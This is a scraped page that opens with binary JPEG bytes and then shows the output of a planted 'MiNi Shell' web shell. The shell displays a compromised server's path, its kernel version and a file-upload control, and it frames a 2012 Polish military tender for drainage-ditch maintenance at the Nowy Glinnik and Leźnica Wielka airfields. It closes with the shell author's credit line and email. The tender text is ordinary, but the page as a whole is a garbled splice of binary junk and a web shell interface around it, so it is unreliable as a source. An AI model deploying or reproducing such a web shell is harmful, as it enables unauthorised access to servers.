JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120910/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120910/339910-N-2012.html

<p class="kh_header"><b>Zgierz: Konserwacja rowów odwadniających z terenu lotnisk Nowy Glinnik i Leźnica Wielka</b><br>
<b>Numer ogłoszenia: 339910 - 2012; data zamieszczenia: 10.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 2573 , ul. Konstantynowska 85, 95-100 Zgierz, woj. łódzkie, tel. 42 750 20 98, faks 42 750 21 01.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja rowów odwadniających z terenu lotnisk Nowy Glinnik i Leźnica Wielka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 Konserwacja rowów odwadniających na terenie kompleksu lotniskowego w Leźnicy Wielkiej:
a)	rów A o długości 2690,0 m
b)	rów B o długości 255,0 m
c)	rów C o długości 370,0 m
d)	rów D o długości 60,0 m
e)	rów E o długości 640,0 m
f)	rów F o długości 700,0 m
1.1. ręczne wykaszanie porostu traw na skarpach i dnach rowów
1.2. ręczne ścinanie i karczowanie krzewów i samosiewów ze skarp i dna rowów
1.3. oczyszczenie terenu z pozostałości po wykoszeniu i karczowaniu z wywiezieniem 
1.4. odmulenie dna rowów i rozplantowanie wydobytego urobku wzdłuż 1 m wykopów 
1.5. odmulenie ręczne dna rowów przy braku dostępu pojazdów mechanicznych
1.6. oczyszczenie i odmulenie przepustów na wymienionych rowach: 
a) rów A - 5 przepustów
b) rów B - 2 przepusty
c) rów C - 1 przepust
d) rów D - 1 przepust 
e) rów E - 3 przepusty 
f) rów F - 1 przepust
1.7.	Wyczyszczenie i konserwacja studzienek rewizyjnych na pasie startowym - 11 szt. (4 studzienki o wymiarach 290 cm x 45 cm głębokość 1 m oraz 7 studzienek o wymiarach 100 cm x 45 cm głębokość 1 m)
1.8. usunięcie naniesionego materiału zanieczyszczającego w postaci piasku, namułu, błota, szlamu, gałęzi, śmieci itp. utrudniającego prawidłowe funkcjonowanie urządzenia
1.9. konserwacja kratek ściekowych polegająca na usunięciu rdzy i pokryciu powłoką antykorozyjną. 
2. Szczegółowy opis przedmiotu zamówienia dla zadania nr 2
2.1. Konserwacja rowów odwadniających z terenu lotniska Nowy Glinnik:
a) rów nr 1 o długości 208,1 m
b) rów nr 2 o długości 500,0 m  
2.2. ręczne wykaszanie porostów traw na skarpach i dnach rowów
2.3. ręczne ścinanie i karczowanie krzewów i samosiewów ze skarp i dna rowów 
2.4. oczyszczanie terenu z pozostałości po wykoszeniu i karczowaniu wywiezieniem
2.5. odmulenie dna rowów i rozplantowanie wydobytego urobki wzdłuż 1 m wykopów
2.6. odmulenie ręczne dna rowów przy braku dostępu pojazdów mechanicznych
2.7. oczyszczenie i odmulenie przepustów na wyżej wymienionych rowach - 2 przepusty (po jednym na każdym z wymienionych rowów)
2.8. Konserwacja rowów odwadniających z terenu lotniska Nowy Glinnik: rów nr 3 o długości 520,0 m
2.9. ręczne wykaszanie porostów traw na skarpach i dnach rowów
2.10. ręczne ścinanie i karczowanie krzewów i samosiewów ze skarp i dna rowów 
2.11. oczyszczanie terenu z pozostałości po wykoszeniu i karczowaniu wywiezieniem
2.12. odmulenie dna rowu i rozplantowanie wydobytego urobki wzdłuż 1 m wykopów
2.13. odmulenie ręczne dna rowów przy braku dostępu pojazdów mechanicznych
2.14. wyrównanie linii skarp i wykonanie nowego pochylenia
2.15. oczyszczenie i odmulenie przepustu - 1 szt.
2.16. ułożenie przepustu drogowego z rur O400mm, szerokości 4,0 m - 1 szt.
2.17. odtworzenie całkowite rowu na odcinku ok. 200 m (rów całkowicie zasypany)
2.18. wyrównanie krawędzi rowu
2.19. wyczyszczenie i konserwacja studzienek rewizyjnych - 49 szt. 
2.20. usunięcie naniesionego materiału zanieczyszczającego w postaci piasku, namułu, błota, szlamu, gałęzi, śmieci itp. utrudniającego prawidłowe funkcjonowanie urządzenia
2.21. konserwacja kratek ściekowych polegająca na usunięciu rdzy i pokryciu powłoką antykorozyjną..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.40.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia w trybie art. 22 ust. 1 ustawy Pzp  zał. nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż posiada  doświadczenie zdobyte poprzez należyte wykonanie w okresie ostatnich 3 lat (a jeżeli okres działalności jest krótszy w tym okresie), przed upływem terminu składania ofert, co najmniej 2 usług (jedna usługa zrealizowana w ramach jednej  umowy) odpowiadających przedmiotowi niniejszego zamówienia, tj. konserwacja rowów odwadniających o wartości nie mniejszej niż:
Zadanie 1 -  70.000,00 PLN brutto 
Zadanie 2  - 50.000,00 PLN brutto
Jeżeli Wykonawca składa ofertę na oba zadania musi wykazać się doświadczeniem w realizacji usług o wartości stanowiącej sumę wskazanej kwoty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia w trybie art. 22 ust. 1 ustawy Pzp  zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia w trybie art. 22 ust. 1 ustawy Pzp  zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia w trybie art. 22 ust. 1 ustawy Pzp  zał. nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania, podpisane przez osoby uprawnione do reprezentowania wykonawcy, pełnomocnictwo w przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmiana wartości umowy brutto w przypadku ustawowej zmiany podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetarg.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 2573 w Zgierzu ul. Konstantynowska 85 bud. 1 pok. 101-102 w godz. 7.30 -15.30 lub za pośrednictwem poczty po uprzednim złożeniu/przesłaniu wniosku..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.09.2012 godzina 10:00, miejsce: Jednostka Wojskowa 2573 w Zgierzu ul. Konstantynowska 85 bud. 2 pok. 114 (Kancelaria Jawna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> sposób porozumiewania się - faks nr (42) 750-21-01.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Konserwacja rowów odwadniających na terenie kompleksu lotniskowego w Leźnicy Wielkiej:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja rowów odwadniających na terenie kompleksu lotniskowego w Leźnicy Wielkiej
a)	rów A o długości 2690,0 m
b)	rów B o długości 255,0 m
c)	rów C o długości 370,0 m
d)	rów D o długości 60,0 m
e)	rów E o długości 640,0 m
f)	rów F o długości 700,0 m
2.	ręczne wykaszanie porostu traw na skarpach i dnach rowów
3.	ręczne ścinanie i karczowanie krzewów i samosiewów ze skarp i dna rowów
4.	oczyszczenie terenu z pozostałości po wykoszeniu i karczowaniu z wywiezieniem 
5.	odmulenie dna rowów i rozplantowanie wydobytego urobku wzdłuż 1 m wykopów 
6.	odmulenie ręczne dna rowów przy braku dostępu pojazdów mechanicznych
7.	oczyszczenie i odmulenie przepustów na wymienionych rowach: 
a)	rów A - 5 przepustów
b)	rów B - 2 przepusty
c)	rów C - 1 przepust
d)	rów D - 1 przepust 
e)	rów E - 3 przepusty 
f)	rów F - 1 przepust
8.	Wyczyszczenie i konserwacja studzienek rewizyjnych na pasie startowym - 11 szt. (4 studzienki o wymiarach 290 cm x 45 cm głębokość 1 m oraz 7 studzienek o wymiarach 100 cm x 45 cm głębokość 1 m)
9.	usunięcie naniesionego materiału zanieczyszczającego w postaci piasku, namułu, błota, szlamu, gałęzi, śmieci itp. utrudniającego prawidłowe funkcjonowanie urządzenia
10.	 konserwacja kratek ściekowych polegająca na usunięciu rdzy i pokryciu powłoką antykorozyjną..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.40.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Konserwacja rowów odwadniających z terenu lotniska Nowy Glinnik:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Konserwacja rowów odwadniających z terenu lotniska Nowy Glinnik:
a)	rów nr 1 o długości 208,1 m
b)	rów nr 2 o długości 500,0 m  
2.	ręczne wykaszanie porostów traw na skarpach i dnach rowów
3.	ręczne ścinanie i karczowanie krzewów i samosiewów ze skarp i dna rowów 
4.	oczyszczanie terenu z pozostałości po wykoszeniu i karczowaniu wywiezieniem
5.	odmulenie dna rowów i rozplantowanie wydobytego urobki wzdłuż 1 m wykopów
6.	odmulenie ręczne dna rowów przy braku dostępu pojazdów mechanicznych
7.	oczyszczenie i odmulenie przepustów na wyżej wymienionych rowach - 2 przepusty (po jednym na każdym z wymienionych rowów)
8.	Konserwacja rowów odwadniających z terenu lotniska Nowy Glinnik: rów nr 3 o długości 520,0 m
9.	ręczne wykaszanie porostów traw na skarpach i dnach rowów
10.	ręczne ścinanie i karczowanie krzewów i samosiewów ze skarp i dna rowów 
11.	oczyszczanie terenu z pozostałości po wykoszeniu i karczowaniu wywiezieniem
12.	odmulenie dna rowu i rozplantowanie wydobytego urobki wzdłuż 1 m wykopów
13.	odmulenie ręczne dna rowów przy braku dostępu pojazdów mechanicznych
14.	wyrównanie linii skarp i wykonanie nowego pochylenia
15.	oczyszczenie i odmulenie przepustu - 1 szt.
16.	ułożenie przepustu drogowego z rur O400mm, szerokości 4,0 m - 1 szt.
17.	odtworzenie całkowite rowu na odcinku ok. 200 m (rów całkowicie zasypany)
18.	wyrównanie krawędzi rowu
19.	wyczyszczenie i konserwacja studzienek rewizyjnych - 49 szt. 
20.	usunięcie naniesionego materiału zanieczyszczającego w postaci piasku, namułu, błota, szlamu, gałęzi, śmieci itp. utrudniającego prawidłowe funkcjonowanie urządzenia
21.	konserwacja kratek ściekowych polegająca na usunięciu rdzy i pokryciu powłoką antykorozyjną..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.40.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com